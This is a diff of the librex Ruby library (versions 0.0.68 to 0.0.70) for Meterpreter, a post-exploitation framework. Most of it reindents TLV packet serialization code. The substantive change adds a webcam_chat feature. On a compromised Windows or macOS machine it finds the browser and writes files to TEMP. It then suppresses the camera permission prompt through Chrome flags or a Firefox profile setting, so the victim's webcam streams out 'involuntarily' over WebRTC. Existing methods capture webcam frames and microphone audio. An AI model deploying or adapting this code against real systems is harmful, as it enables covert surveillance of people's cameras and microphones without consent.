librex 0.0.68 → 0.0.70

data/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb

@@ -1,6 +1,7 @@
-#!/usr/bin/env ruby
 # -*- coding: binary -*-
 
+#require 'rex/post/meterpreter/extensions/process'
+
 module Rex
 module Post
 module Meterpreter
@@ -15,49 +16,185 @@ module Webcam
 ###
 class Webcam
 
-	def initialize(client)
-		@client = client
-	end
-
-	def webcam_list
-		response = client.send_request(Packet.create_request('webcam_list'))
-		names = []
-		response.get_tlvs( TLV_TYPE_WEBCAM_NAME ).each{ |tlv|
-			names << tlv.value
-		}
-		names
-	end
-
-	# Starts recording video from video source of index #{cam}
-	def webcam_start(cam)
-		request = Packet.create_request('webcam_start')
-		request.add_tlv(TLV_TYPE_WEBCAM_INTERFACE_ID, cam)
-		client.send_request(request)
-		true
-	end
-
-	def webcam_get_frame(quality)
-		request = Packet.create_request('webcam_get_frame')
-		request.add_tlv(TLV_TYPE_WEBCAM_QUALITY, quality)
-		response = client.send_request(request)
-		response.get_tlv( TLV_TYPE_WEBCAM_IMAGE ).value
-	end
-
-	def webcam_stop
-		client.send_request( Packet.create_request( 'webcam_stop' )  )
-		true
-	end
-
-	# Record from default audio source for #{duration} seconds;
-	# returns a low-quality wav file
-	def record_mic(duration)
-		request = Packet.create_request('webcam_audio_record')
-		request.add_tlv(TLV_TYPE_AUDIO_DURATION, duration)
-		response = client.send_request(request)
-		response.get_tlv( TLV_TYPE_AUDIO_DATA ).value
-	end
-
-	attr_accessor :client
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Post::WebRTC
+
+  def initialize(client)
+    @client = client
+  end
+
+  def session
+    @client
+  end
+
+  def webcam_list
+    response = client.send_request(Packet.create_request('webcam_list'))
+    names = []
+    response.get_tlvs( TLV_TYPE_WEBCAM_NAME ).each{ |tlv|
+      names << tlv.value
+    }
+    names
+  end
+
+  # Starts recording video from video source of index +cam+
+  def webcam_start(cam)
+    request = Packet.create_request('webcam_start')
+    request.add_tlv(TLV_TYPE_WEBCAM_INTERFACE_ID, cam)
+    client.send_request(request)
+    true
+  end
+
+  def webcam_get_frame(quality)
+    request = Packet.create_request('webcam_get_frame')
+    request.add_tlv(TLV_TYPE_WEBCAM_QUALITY, quality)
+    response = client.send_request(request)
+    response.get_tlv( TLV_TYPE_WEBCAM_IMAGE ).value
+  end
+
+  def webcam_stop
+    client.send_request( Packet.create_request( 'webcam_stop' )  )
+    true
+  end
+
+  #
+  # Starts a webcam session with a remote user via WebRTC
+  #
+  # @param server [String] A server to use for the channel.
+  # @return void
+  #
+  def webcam_chat(server)
+    offerer_id = Rex::Text.rand_text_alphanumeric(10)
+    channel    = Rex::Text.rand_text_alphanumeric(20)
+
+    remote_browser_path = get_webrtc_browser_path
+
+    if remote_browser_path.blank?
+      raise RuntimeError, "Unable to find a suitable browser on the target machine"
+    end
+
+    ready_status = init_video_chat(remote_browser_path, server, channel, offerer_id)
+    connect_video_chat(server, channel, offerer_id)
+  end
+
+  # Record from default audio source for +duration+ seconds;
+  # returns a low-quality wav file
+  def record_mic(duration)
+    request = Packet.create_request('webcam_audio_record')
+    request.add_tlv(TLV_TYPE_AUDIO_DURATION, duration)
+    response = client.send_request(request)
+    response.get_tlv( TLV_TYPE_AUDIO_DATA ).value
+  end
+
+  attr_accessor :client
+
+
+  private
+
+
+  #
+  # Returns a browser path that supports WebRTC
+  #
+  # @return [String]
+  #
+  def get_webrtc_browser_path
+    found_browser_path = ''
+
+    case client.platform
+    when /win/
+      paths = [
+        "Program Files\\Google\\Chrome\\Application\\chrome.exe",
+        "Program Files\\Mozilla Firefox\\firefox.exe"
+      ]
+
+      drive = session.sys.config.getenv("SYSTEMDRIVE")
+      paths = paths.map { |p| "#{drive}\\#{p}" }
+
+      # Old chrome path
+      user_profile = client.sys.config.getenv("USERPROFILE")
+      paths << "#{user_profile}\\Local Settings\\Application Data\\Google\\Chrome\\Application\\chrome.exe"
+
+      paths.each do |browser_path|
+        if file?(browser_path)
+          found_browser_path = browser_path
+          break
+        end
+      end
+
+    when /osx|bsd/
+      [
+        '/Applications/Google Chrome.app',
+        '/Applications/Firefox.app',
+      ].each do |browser_path|
+        if file?(browser_path)
+          found_browser_path = browser_path
+          break
+        end
+      end
+    when /linux|unix/
+      # Need to add support for Linux in the future.
+      # But you see, the Linux meterpreter is so broken there is no point
+      # to do it now. You can't test anyway.
+    end
+
+    found_browser_path
+  end
+
+
+  #
+  # Creates a video chat session as an offerer... involuntarily :-p
+  # Windows targets only.
+  #
+  # @param remote_browser_path [String] A browser path that supports WebRTC on the target machine
+  # @param offerer_id [String] A ID that the answerer can look for and join
+  #
+  def init_video_chat(remote_browser_path, server, channel, offerer_id)
+    interface = load_interface('offerer.html')
+    api       = load_api_code
+
+    interface = interface.gsub(/\=SERVER\=/, server)
+    interface = interface.gsub(/\=CHANNEL\=/, channel)
+    interface = interface.gsub(/\=OFFERERID\=/, offerer_id)
+
+    tmp_dir = session.sys.config.getenv("TEMP")
+
+    begin
+      write_file("#{tmp_dir}\\interface.html", interface)
+      write_file("#{tmp_dir}\\api.js", api)
+    rescue ::Exception => e
+      elog("webcam_chat failed. #{e.class} #{e.to_s}")
+      raise RuntimeError, "Unable to initialize the interface on the target machine"
+    end
+
+    #
+    # Automatically allow the webcam to run on the target machine
+    #
+    args = ''
+    if remote_browser_path =~ /Chrome/
+      args = "--allow-file-access-from-files --use-fake-ui-for-media-stream"
+    elsif remote_browser_path =~ /Firefox/
+      profile_name = Rex::Text.rand_text_alpha(8)
+      o = cmd_exec("#{remote_browser_path} --CreateProfile #{profile_name} #{tmp_dir}\\#{profile_name}")
+      profile_path = (o.scan(/created profile '.+' at '(.+)'/).flatten[0] || '').strip
+      setting = %Q|user_pref("media.navigator.permission.disabled", true);|
+      begin
+        write_file(profile_path, setting)
+      rescue ::Exception => e
+        elog("webcam_chat failed: #{e.class} #{e.to_s}")
+        raise RuntimeError, "Unable to write the necessary setting for Firefox."
+      end
+      args = "-p #{profile_name}"
+    end
+
+    exec_opts = {'Hidden' => false, 'Channelized' => false}
+
+    begin
+      session.sys.process.execute(remote_browser_path, "#{args} #{tmp_dir}\\interface.html", exec_opts)
+    rescue ::Exception => e
+      elog("webcam_chat failed. #{e.class} #{e.to_s}")
+      raise RuntimeError, "Unable to start the remote browser: #{e.message}"
+    end
+  end
 
 end
 

data/lib/rex/post/meterpreter/inbound_packet_handler.rb

@@ -1,4 +1,3 @@
-#!/usr/bin/env ruby
 # -*- coding: binary -*-
 
 module Rex
@@ -12,19 +11,19 @@ module Meterpreter
 ###
 module InboundPacketHandler
 
-	#
-	# Stub request handler that returns false by default.
-	#
-	def request_handler(client, packet)
-		return false
-	end
+  #
+  # Stub request handler that returns false by default.
+  #
+  def request_handler(client, packet)
+    return false
+  end
 
-	#
-	# Stub response handler that returns false by default.
-	#
-	def response_handler(client, packet)
-		return false
-	end
+  #
+  # Stub response handler that returns false by default.
+  #
+  def response_handler(client, packet)
+    return false
+  end
 
 end
 

data/lib/rex/post/meterpreter/object_aliases.rb

@@ -1,4 +1,3 @@
-#!/usr/bin/env ruby
 # -*- coding: binary -*-
 
 module Rex
@@ -13,50 +12,50 @@ module Meterpreter
 ###
 module ObjectAliasesContainer
 
-	#
-	# Initialize the instance's aliases.
-	#
-	def initialize_aliases(aliases = {})
-		self.aliases = aliases
-	end
-
-	#
-	# Pass-thru aliases.
-	#
-	def method_missing(symbol, *args)
-		self.aliases[symbol.to_s]
-	end
-
-	#
-	# Recursively dumps all of the aliases registered with a class that
-	# is kind_of? ObjectAliases.
-	#
-	def dump_alias_tree(parent_path, current = nil)
-		items = []
-
-		if (current == nil)
-			current = self
-		end
-
-		# If the current object may have object aliases...
-		if (current.kind_of?(Rex::Post::Meterpreter::ObjectAliases))
-			current.aliases.each_key { |x|
-				current_path = parent_path + '.' + x
-
-				items << current_path
-
-				items.concat(dump_alias_tree(current_path,
-					current.aliases[x]))
-			}
-		end
-
-		return items
-	end
-
-	#
-	# The hash of aliases.
-	#
-	attr_accessor :aliases
+  #
+  # Initialize the instance's aliases.
+  #
+  def initialize_aliases(aliases = {})
+    self.aliases = aliases
+  end
+
+  #
+  # Pass-thru aliases.
+  #
+  def method_missing(symbol, *args)
+    self.aliases[symbol.to_s]
+  end
+
+  #
+  # Recursively dumps all of the aliases registered with a class that
+  # is kind_of? ObjectAliases.
+  #
+  def dump_alias_tree(parent_path, current = nil)
+    items = []
+
+    if (current == nil)
+      current = self
+    end
+
+    # If the current object may have object aliases...
+    if (current.kind_of?(Rex::Post::Meterpreter::ObjectAliases))
+      current.aliases.each_key { |x|
+        current_path = parent_path + '.' + x
+
+        items << current_path
+
+        items.concat(dump_alias_tree(current_path,
+          current.aliases[x]))
+      }
+    end
+
+    return items
+  end
+
+  #
+  # The hash of aliases.
+  #
+  attr_accessor :aliases
 end
 
 ###
@@ -66,18 +65,18 @@ end
 #
 ###
 class ObjectAliases
-	include Rex::Post::Meterpreter::ObjectAliasesContainer
-
-	##
-	#
-	# Constructor
-	#
-	##
-
-	# An instance
-	def initialize(aliases = {})
-		initialize_aliases(aliases)
-	end
+  include Rex::Post::Meterpreter::ObjectAliasesContainer
+
+  ##
+  #
+  # Constructor
+  #
+  ##
+
+  # An instance
+  def initialize(aliases = {})
+    initialize_aliases(aliases)
+  end
 end
 
 

data/lib/rex/post/meterpreter/packet.rb

@@ -1,4 +1,3 @@
-#!/usr/bin/env ruby
 # -*- coding: binary -*-
 
 module Rex
@@ -29,13 +28,13 @@ TLV_META_TYPE_COMPLEX       = (1 << 31)
 # Exclude compressed from the mask since other meta types (e.g. RAW) can also
 # be compressed
 TLV_META_MASK = (
-	TLV_META_TYPE_STRING |
-	TLV_META_TYPE_UINT |
-	TLV_META_TYPE_RAW |
-	TLV_META_TYPE_BOOL |
-	TLV_META_TYPE_QWORD |
-	TLV_META_TYPE_GROUP |
-	TLV_META_TYPE_COMPLEX
+  TLV_META_TYPE_STRING |
+  TLV_META_TYPE_UINT |
+  TLV_META_TYPE_RAW |
+  TLV_META_TYPE_BOOL |
+  TLV_META_TYPE_QWORD |
+  TLV_META_TYPE_GROUP |
+  TLV_META_TYPE_COMPLEX
 )
 
 #
@@ -101,247 +100,247 @@ LOAD_LIBRARY_FLAG_LOCAL     = (1 << 2)
 #
 ###
 class Tlv
-	attr_accessor :type, :value, :compress
-
-	##
-	#
-	# Constructor
-	#
-	##
-
-	#
-	# Returns an instance of a TLV.
-	#
-	def initialize(type, value = nil, compress=false)
-		@type     = type
-		@compress = compress
-
-		if (value != nil)
-			if (type & TLV_META_TYPE_STRING == TLV_META_TYPE_STRING)
-				if (value.kind_of?(Fixnum))
-					@value = value.to_s
-				else
-					@value = value.dup
-				end
-			else
-				@value = value
-			end
-		end
-	end
-
-	def inspect
-		utype = type ^ TLV_META_TYPE_COMPRESSED
-		group = false
-		meta = case (utype & TLV_META_MASK)
-			when TLV_META_TYPE_STRING; "STRING"
-			when TLV_META_TYPE_UINT; "INT"
-			when TLV_META_TYPE_RAW; "RAW"
-			when TLV_META_TYPE_BOOL; "BOOL"
-			when TLV_META_TYPE_QWORD; "QWORD"
-			when TLV_META_TYPE_GROUP; group=true; "GROUP"
-			when TLV_META_TYPE_COMPLEX; "COMPLEX"
-			else; 'unknown-meta-type'
-			end
-		stype = case type
-			when PACKET_TYPE_REQUEST; "Request"
-			when PACKET_TYPE_RESPONSE; "Response"
-			when TLV_TYPE_REQUEST_ID; "REQUEST-ID"
-			when TLV_TYPE_METHOD; "METHOD"
-			when TLV_TYPE_RESULT; "RESULT"
-			when TLV_TYPE_EXCEPTION; "EXCEPTION"
-			when TLV_TYPE_STRING; "STRING"
-			when TLV_TYPE_UINT; "UINT"
-			when TLV_TYPE_BOOL; "BOOL"
-
-			when TLV_TYPE_LENGTH; "LENGTH"
-			when TLV_TYPE_DATA; "DATA"
-			when TLV_TYPE_FLAGS; "FLAGS"
-
-			when TLV_TYPE_CHANNEL_ID; "CHANNEL-ID"
-			when TLV_TYPE_CHANNEL_TYPE; "CHANNEL-TYPE"
-			when TLV_TYPE_CHANNEL_DATA; "CHANNEL-DATA"
-			when TLV_TYPE_CHANNEL_DATA_GROUP; "CHANNEL-DATA-GROUP"
-			when TLV_TYPE_CHANNEL_CLASS; "CHANNEL-CLASS"
-			when TLV_TYPE_CHANNEL_PARENTID; "CHANNEL-PARENTID"
-
-			when TLV_TYPE_SEEK_WHENCE; "SEEK-WHENCE"
-			when TLV_TYPE_SEEK_OFFSET; "SEEK-OFFSET"
-			when TLV_TYPE_SEEK_POS; "SEEK-POS"
-
-			when TLV_TYPE_EXCEPTION_CODE; "EXCEPTION-CODE"
-			when TLV_TYPE_EXCEPTION_STRING; "EXCEPTION-STRING"
-
-			when TLV_TYPE_LIBRARY_PATH; "LIBRARY-PATH"
-			when TLV_TYPE_TARGET_PATH; "TARGET-PATH"
-			when TLV_TYPE_MIGRATE_PID; "MIGRATE-PID"
-			when TLV_TYPE_MIGRATE_LEN; "MIGRATE-LEN"
-			when TLV_TYPE_MIGRATE_PAYLOAD; "MIGRATE-PAYLOAD"
-			when TLV_TYPE_MIGRATE_ARCH; "MIGRATE-ARCH"
-
-			#when Extensions::Stdapi::TLV_TYPE_NETWORK_INTERFACE; 'network-interface'
-			#when Extensions::Stdapi::TLV_TYPE_IP; 'ip-address'
-			#when Extensions::Stdapi::TLV_TYPE_NETMASK; 'netmask'
-			#when Extensions::Stdapi::TLV_TYPE_MAC_ADDRESS; 'mac-address'
-			#when Extensions::Stdapi::TLV_TYPE_MAC_NAME; 'interface-name'
-			#when Extensions::Stdapi::TLV_TYPE_IP6_SCOPE; 'address-scope'
-			#when Extensions::Stdapi::TLV_TYPE_INTERFACE_MTU; 'interface-mtu'
-			#when Extensions::Stdapi::TLV_TYPE_INTERFACE_FLAGS; 'interface-flags'
-			#when Extensions::Stdapi::TLV_TYPE_INTERFACE_INDEX; 'interface-index'
-
-			else; "unknown-#{type}"
-			end
-		val = value.inspect
-		if val.length > 50
-			val = val[0,50] + ' ..."'
-		end
-		group ||= (self.class.to_s =~ /Packet/)
-		if group
-			tlvs_inspect = "tlvs=[\n"
-			@tlvs.each { |t|
-				tlvs_inspect << "  #{t.inspect}\n"
-			}
-			tlvs_inspect << "]"
-		else
-			tlvs_inspect = "meta=#{meta.ljust 10} value=#{val}"
-		end
-		"#<#{self.class} type=#{stype.ljust 15} #{tlvs_inspect}>"
-	end
-
-	##
-	#
-	# Conditionals
-	#
-	##
-
-	#
-	# Checks to see if a TLVs meta type is equivalent to the meta type passed.
-	#
-	def meta_type?(meta)
-		return (self.type & meta == meta)
-	end
-
-	#
-	# Checks to see if the TLVs type is equivalent to the type passed.
-	#
-	def type?(type)
-		return self.type == type
-	end
-
-	#
-	# Checks to see if the TLVs value is equivalent to the value passed.
-	#
-	def value?(value)
-		return self.value == value
-	end
-
-	##
-	#
-	# Serializers
-	#
-	##
-
-	#
-	# Converts the TLV to raw.
-	#
-	def to_r
-		# Forcibly convert to ASCII-8BIT encoding
-		raw = value.to_s.unpack("C*").pack("C*")
-
-		if (self.type & TLV_META_TYPE_STRING == TLV_META_TYPE_STRING)
-			raw += "\x00"
-		elsif (self.type & TLV_META_TYPE_UINT == TLV_META_TYPE_UINT)
-			raw = [value].pack("N")
-		elsif (self.type & TLV_META_TYPE_QWORD == TLV_META_TYPE_QWORD)
-			raw = [ self.htonq( value.to_i ) ].pack("Q")
-		elsif (self.type & TLV_META_TYPE_BOOL == TLV_META_TYPE_BOOL)
-			if (value == true)
-				raw = [1].pack("c")
-			else
-				raw = [0].pack("c")
-			end
-		end
-
-		# check if the tlv is to be compressed...
-		if( @compress )
-			raw_uncompressed = raw
-			# compress the raw data
-			raw_compressed = Rex::Text.zlib_deflate( raw_uncompressed )
-			# check we have actually made the raw data smaller...
-			# (small blobs often compress slightly larger then the origional)
-			# if the compressed data is not smaller, we dont use the compressed data
-			if( raw_compressed.length < raw_uncompressed.length )
-				# if so, set the TLV's type to indicate compression is used
-				self.type = self.type | TLV_META_TYPE_COMPRESSED
-				# update the raw data with the uncompressed data length + compressed data
-				# (we include the uncompressed data length as the C side will need to know this for decompression)
-				raw = [ raw_uncompressed.length ].pack("N") + raw_compressed
-			end
-		end
-
-		return [raw.length + 8, self.type].pack("NN") + raw
-	end
-
-	#
-	# Translates the raw format of the TLV into a sanitize version.
-	#
-	def from_r(raw)
-		self.value  = nil
-
-		length, self.type = raw.unpack("NN");
-
-		# check if the tlv value has been compressed...
-		if( self.type & TLV_META_TYPE_COMPRESSED == TLV_META_TYPE_COMPRESSED )
-			# set this TLV as using compression
-			@compress = true
-			# remove the TLV_META_TYPE_COMPRESSED flag from the tlv type to restore the
-			# tlv type to its origional, allowing for transparent data compression.
-			self.type = self.type ^ TLV_META_TYPE_COMPRESSED
-			# decompress the compressed data (skipping the length and type DWORD's)
-			raw_decompressed = Rex::Text.zlib_inflate( raw[8..length-1] )
-			# update the length to reflect the decompressed data length (+8 for the length and type DWORD's)
-			length = raw_decompressed.length + 8
-			# update the raw buffer with the new length, decompressed data and updated type.
-			raw = [length, self.type].pack("NN") + raw_decompressed
-		end
-
-		if (self.type & TLV_META_TYPE_STRING == TLV_META_TYPE_STRING)
-			if (raw.length > 0)
-				self.value = raw[8..length-2]
-			else
-				self.value = nil
-			end
-		elsif (self.type & TLV_META_TYPE_UINT == TLV_META_TYPE_UINT)
-			self.value = raw.unpack("NNN")[2]
-		elsif (self.type & TLV_META_TYPE_QWORD == TLV_META_TYPE_QWORD)
-			self.value = raw.unpack("NNQ")[2]
-			self.value = self.ntohq( self.value )
-		elsif (self.type & TLV_META_TYPE_BOOL == TLV_META_TYPE_BOOL)
-			self.value = raw.unpack("NNc")[2]
-
-			if (self.value == 1)
-				self.value = true
-			else
-				self.value = false
-			end
-		else
-			self.value = raw[8..length-1]
-		end
-
-		return length;
-	end
-
-	protected
-
-	def htonq( value )
-		if( [1].pack( 's' ) == [1].pack( 'n' ) )
-			return value
-		end
-		return [ value ].pack( 'Q' ).reverse.unpack( 'Q' ).first
-	end
-
-	def ntohq( value )
-		return htonq( value )
-	end
+  attr_accessor :type, :value, :compress
+
+  ##
+  #
+  # Constructor
+  #
+  ##
+
+  #
+  # Returns an instance of a TLV.
+  #
+  def initialize(type, value = nil, compress=false)
+    @type     = type
+    @compress = compress
+
+    if (value != nil)
+      if (type & TLV_META_TYPE_STRING == TLV_META_TYPE_STRING)
+        if (value.kind_of?(Fixnum))
+          @value = value.to_s
+        else
+          @value = value.dup
+        end
+      else
+        @value = value
+      end
+    end
+  end
+
+  def inspect
+    utype = type ^ TLV_META_TYPE_COMPRESSED
+    group = false
+    meta = case (utype & TLV_META_MASK)
+      when TLV_META_TYPE_STRING; "STRING"
+      when TLV_META_TYPE_UINT; "INT"
+      when TLV_META_TYPE_RAW; "RAW"
+      when TLV_META_TYPE_BOOL; "BOOL"
+      when TLV_META_TYPE_QWORD; "QWORD"
+      when TLV_META_TYPE_GROUP; group=true; "GROUP"
+      when TLV_META_TYPE_COMPLEX; "COMPLEX"
+      else; 'unknown-meta-type'
+      end
+    stype = case type
+      when PACKET_TYPE_REQUEST; "Request"
+      when PACKET_TYPE_RESPONSE; "Response"
+      when TLV_TYPE_REQUEST_ID; "REQUEST-ID"
+      when TLV_TYPE_METHOD; "METHOD"
+      when TLV_TYPE_RESULT; "RESULT"
+      when TLV_TYPE_EXCEPTION; "EXCEPTION"
+      when TLV_TYPE_STRING; "STRING"
+      when TLV_TYPE_UINT; "UINT"
+      when TLV_TYPE_BOOL; "BOOL"
+
+      when TLV_TYPE_LENGTH; "LENGTH"
+      when TLV_TYPE_DATA; "DATA"
+      when TLV_TYPE_FLAGS; "FLAGS"
+
+      when TLV_TYPE_CHANNEL_ID; "CHANNEL-ID"
+      when TLV_TYPE_CHANNEL_TYPE; "CHANNEL-TYPE"
+      when TLV_TYPE_CHANNEL_DATA; "CHANNEL-DATA"
+      when TLV_TYPE_CHANNEL_DATA_GROUP; "CHANNEL-DATA-GROUP"
+      when TLV_TYPE_CHANNEL_CLASS; "CHANNEL-CLASS"
+      when TLV_TYPE_CHANNEL_PARENTID; "CHANNEL-PARENTID"
+
+      when TLV_TYPE_SEEK_WHENCE; "SEEK-WHENCE"
+      when TLV_TYPE_SEEK_OFFSET; "SEEK-OFFSET"
+      when TLV_TYPE_SEEK_POS; "SEEK-POS"
+
+      when TLV_TYPE_EXCEPTION_CODE; "EXCEPTION-CODE"
+      when TLV_TYPE_EXCEPTION_STRING; "EXCEPTION-STRING"
+
+      when TLV_TYPE_LIBRARY_PATH; "LIBRARY-PATH"
+      when TLV_TYPE_TARGET_PATH; "TARGET-PATH"
+      when TLV_TYPE_MIGRATE_PID; "MIGRATE-PID"
+      when TLV_TYPE_MIGRATE_LEN; "MIGRATE-LEN"
+      when TLV_TYPE_MIGRATE_PAYLOAD; "MIGRATE-PAYLOAD"
+      when TLV_TYPE_MIGRATE_ARCH; "MIGRATE-ARCH"
+
+      #when Extensions::Stdapi::TLV_TYPE_NETWORK_INTERFACE; 'network-interface'
+      #when Extensions::Stdapi::TLV_TYPE_IP; 'ip-address'
+      #when Extensions::Stdapi::TLV_TYPE_NETMASK; 'netmask'
+      #when Extensions::Stdapi::TLV_TYPE_MAC_ADDRESS; 'mac-address'
+      #when Extensions::Stdapi::TLV_TYPE_MAC_NAME; 'interface-name'
+      #when Extensions::Stdapi::TLV_TYPE_IP6_SCOPE; 'address-scope'
+      #when Extensions::Stdapi::TLV_TYPE_INTERFACE_MTU; 'interface-mtu'
+      #when Extensions::Stdapi::TLV_TYPE_INTERFACE_FLAGS; 'interface-flags'
+      #when Extensions::Stdapi::TLV_TYPE_INTERFACE_INDEX; 'interface-index'
+
+      else; "unknown-#{type}"
+      end
+    val = value.inspect
+    if val.length > 50
+      val = val[0,50] + ' ..."'
+    end
+    group ||= (self.class.to_s =~ /Packet/)
+    if group
+      tlvs_inspect = "tlvs=[\n"
+      @tlvs.each { |t|
+        tlvs_inspect << "  #{t.inspect}\n"
+      }
+      tlvs_inspect << "]"
+    else
+      tlvs_inspect = "meta=#{meta.ljust 10} value=#{val}"
+    end
+    "#<#{self.class} type=#{stype.ljust 15} #{tlvs_inspect}>"
+  end
+
+  ##
+  #
+  # Conditionals
+  #
+  ##
+
+  #
+  # Checks to see if a TLVs meta type is equivalent to the meta type passed.
+  #
+  def meta_type?(meta)
+    return (self.type & meta == meta)
+  end
+
+  #
+  # Checks to see if the TLVs type is equivalent to the type passed.
+  #
+  def type?(type)
+    return self.type == type
+  end
+
+  #
+  # Checks to see if the TLVs value is equivalent to the value passed.
+  #
+  def value?(value)
+    return self.value == value
+  end
+
+  ##
+  #
+  # Serializers
+  #
+  ##
+
+  #
+  # Converts the TLV to raw.
+  #
+  def to_r
+    # Forcibly convert to ASCII-8BIT encoding
+    raw = value.to_s.unpack("C*").pack("C*")
+
+    if (self.type & TLV_META_TYPE_STRING == TLV_META_TYPE_STRING)
+      raw += "\x00"
+    elsif (self.type & TLV_META_TYPE_UINT == TLV_META_TYPE_UINT)
+      raw = [value].pack("N")
+    elsif (self.type & TLV_META_TYPE_QWORD == TLV_META_TYPE_QWORD)
+      raw = [ self.htonq( value.to_i ) ].pack("Q")
+    elsif (self.type & TLV_META_TYPE_BOOL == TLV_META_TYPE_BOOL)
+      if (value == true)
+        raw = [1].pack("c")
+      else
+        raw = [0].pack("c")
+      end
+    end
+
+    # check if the tlv is to be compressed...
+    if( @compress )
+      raw_uncompressed = raw
+      # compress the raw data
+      raw_compressed = Rex::Text.zlib_deflate( raw_uncompressed )
+      # check we have actually made the raw data smaller...
+      # (small blobs often compress slightly larger then the origional)
+      # if the compressed data is not smaller, we dont use the compressed data
+      if( raw_compressed.length < raw_uncompressed.length )
+        # if so, set the TLV's type to indicate compression is used
+        self.type = self.type | TLV_META_TYPE_COMPRESSED
+        # update the raw data with the uncompressed data length + compressed data
+        # (we include the uncompressed data length as the C side will need to know this for decompression)
+        raw = [ raw_uncompressed.length ].pack("N") + raw_compressed
+      end
+    end
+
+    return [raw.length + 8, self.type].pack("NN") + raw
+  end
+
+  #
+  # Translates the raw format of the TLV into a sanitize version.
+  #
+  def from_r(raw)
+    self.value  = nil
+
+    length, self.type = raw.unpack("NN");
+
+    # check if the tlv value has been compressed...
+    if( self.type & TLV_META_TYPE_COMPRESSED == TLV_META_TYPE_COMPRESSED )
+      # set this TLV as using compression
+      @compress = true
+      # remove the TLV_META_TYPE_COMPRESSED flag from the tlv type to restore the
+      # tlv type to its origional, allowing for transparent data compression.
+      self.type = self.type ^ TLV_META_TYPE_COMPRESSED
+      # decompress the compressed data (skipping the length and type DWORD's)
+      raw_decompressed = Rex::Text.zlib_inflate( raw[8..length-1] )
+      # update the length to reflect the decompressed data length (+8 for the length and type DWORD's)
+      length = raw_decompressed.length + 8
+      # update the raw buffer with the new length, decompressed data and updated type.
+      raw = [length, self.type].pack("NN") + raw_decompressed
+    end
+
+    if (self.type & TLV_META_TYPE_STRING == TLV_META_TYPE_STRING)
+      if (raw.length > 0)
+        self.value = raw[8..length-2]
+      else
+        self.value = nil
+      end
+    elsif (self.type & TLV_META_TYPE_UINT == TLV_META_TYPE_UINT)
+      self.value = raw.unpack("NNN")[2]
+    elsif (self.type & TLV_META_TYPE_QWORD == TLV_META_TYPE_QWORD)
+      self.value = raw.unpack("NNQ")[2]
+      self.value = self.ntohq( self.value )
+    elsif (self.type & TLV_META_TYPE_BOOL == TLV_META_TYPE_BOOL)
+      self.value = raw.unpack("NNc")[2]
+
+      if (self.value == 1)
+        self.value = true
+      else
+        self.value = false
+      end
+    else
+      self.value = raw[8..length-1]
+    end
+
+    return length;
+  end
+
+  protected
+
+  def htonq( value )
+    if( [1].pack( 's' ) == [1].pack( 'n' ) )
+      return value
+    end
+    return [ value ].pack( 'Q' ).reverse.unpack( 'Q' ).first
+  end
+
+  def ntohq( value )
+    return htonq( value )
+  end
 
 end
 
@@ -351,216 +350,216 @@ end
 #
 ###
 class GroupTlv < Tlv
-	attr_accessor :tlvs
-
-	##
-	#
-	# Constructor
-	#
-	##
-
-	#
-	# Initializes the group TLV container to the supplied type
-	# and creates an empty TLV array.
-	#
-	def initialize(type)
-		super(type)
-
-		self.tlvs = [ ]
-	end
-
-	##
-	#
-	# Group-based TLV accessors
-	#
-	##
-
-	#
-	# Enumerates TLVs of the supplied type.
-	#
-	def each(type = TLV_TYPE_ANY, &block)
-		get_tlvs(type).each(&block)
-	end
-
-	#
-	# Synonym for each.
-	#
-	def each_tlv(type = TLV_TYPE_ANY, &block)
-		each(type, &block)
-	end
-
-	#
-	# Enumerates TLVs of a supplied type with indexes.
-	#
-	def each_with_index(type = TLV_TYPE_ANY, &block)
-		get_tlvs(type).each_with_index(&block)
-	end
-
-	#
-	# Synonym for each_with_index.
-	#
-	def each_tlv_with_index(type = TLV_TYPE_ANY, &block)
-		each_with_index(type, block)
-	end
-
-	#
-	# Returns an array of TLVs for the given type.
-	#
-	def get_tlvs(type)
-		if (type == TLV_TYPE_ANY)
-			return self.tlvs
-		else
-			type_tlvs = []
-
-			self.tlvs.each() { |tlv|
-				if (tlv.type?(type))
-					type_tlvs << tlv
-				end
-			}
-
-			return type_tlvs
-		end
-	end
-
-	##
-	#
-	# TLV management
-	#
-	##
-
-	#
-	# Adds a TLV of a given type and value.
-	#
-	def add_tlv(type, value = nil, replace = false, compress=false)
-
-		# If we should replace any TLVs with the same type...remove them first
-		if (replace)
-			each(type) { |tlv|
-				if (tlv.type == type)
-					self.tlvs.delete(tlv)
-				end
-			}
-		end
-
-		if (type & TLV_META_TYPE_GROUP == TLV_META_TYPE_GROUP)
-			tlv = GroupTlv.new(type)
-		else
-			tlv = Tlv.new(type, value, compress)
-		end
-
-		self.tlvs << tlv
-
-		return tlv
-	end
-
-	#
-	# Adds zero or more TLVs to the packet.
-	#
-	def add_tlvs(tlvs)
-		if (tlvs != nil)
-			tlvs.each { |tlv|
-				add_tlv(tlv['type'], tlv['value'])
-			}
-		end
-	end
-
-	#
-	# Gets the first TLV of a given type.
-	#
-	def get_tlv(type, index = 0)
-		type_tlvs = get_tlvs(type)
-
-		if (type_tlvs.length > index)
-			return type_tlvs[index]
-		end
-
-		return nil
-	end
-
-	#
-	# Returns the value of a TLV if it exists, otherwise nil.
-	#
-	def get_tlv_value(type, index = 0)
-		tlv = get_tlv(type, index)
-
-		return (tlv != nil) ? tlv.value : nil
-	end
-
-	#
-	# Returns an array of values for all tlvs of type type.
-	#
-	def get_tlv_values(type)
-		get_tlvs(type).collect { |a| a.value }
-	end
-
-	#
-	# Checks to see if the container has a TLV of a given type.
-	#
-	def has_tlv?(type)
-		return get_tlv(type) != nil
-	end
-
-	#
-	# Zeros out the array of TLVs.
-	#
-	def reset
-		self.tlvs = []
-	end
-
-	##
-	#
-	# Serializers
-	#
-	##
-
-	#
-	# Converts all of the TLVs in the TLV array to raw and prefixes them
-	# with a container TLV of this instance's TLV type.
-	#
-	def to_r
-		raw = ''
-
-		self.each() { |tlv|
-			raw << tlv.to_r
-		}
-
-		return [raw.length + 8, self.type].pack("NN") + raw
-	end
-
-	#
-	# Converts the TLV group container from raw to all of the individual
-	# TLVs.
-	#
-	def from_r(raw)
-		offset = 8
-
-		# Reset the TLVs array
-		self.tlvs = []
-		self.type = raw.unpack("NN")[1]
-
-		# Enumerate all of the TLVs
-		while (offset < raw.length-1)
-
-			tlv = nil
-
-			# Get the length and type
-			length, type = raw[offset..offset+8].unpack("NN")
-
-			if (type & TLV_META_TYPE_GROUP == TLV_META_TYPE_GROUP)
-				tlv = GroupTlv.new(type)
-			else
-				tlv = Tlv.new(type)
-			end
-
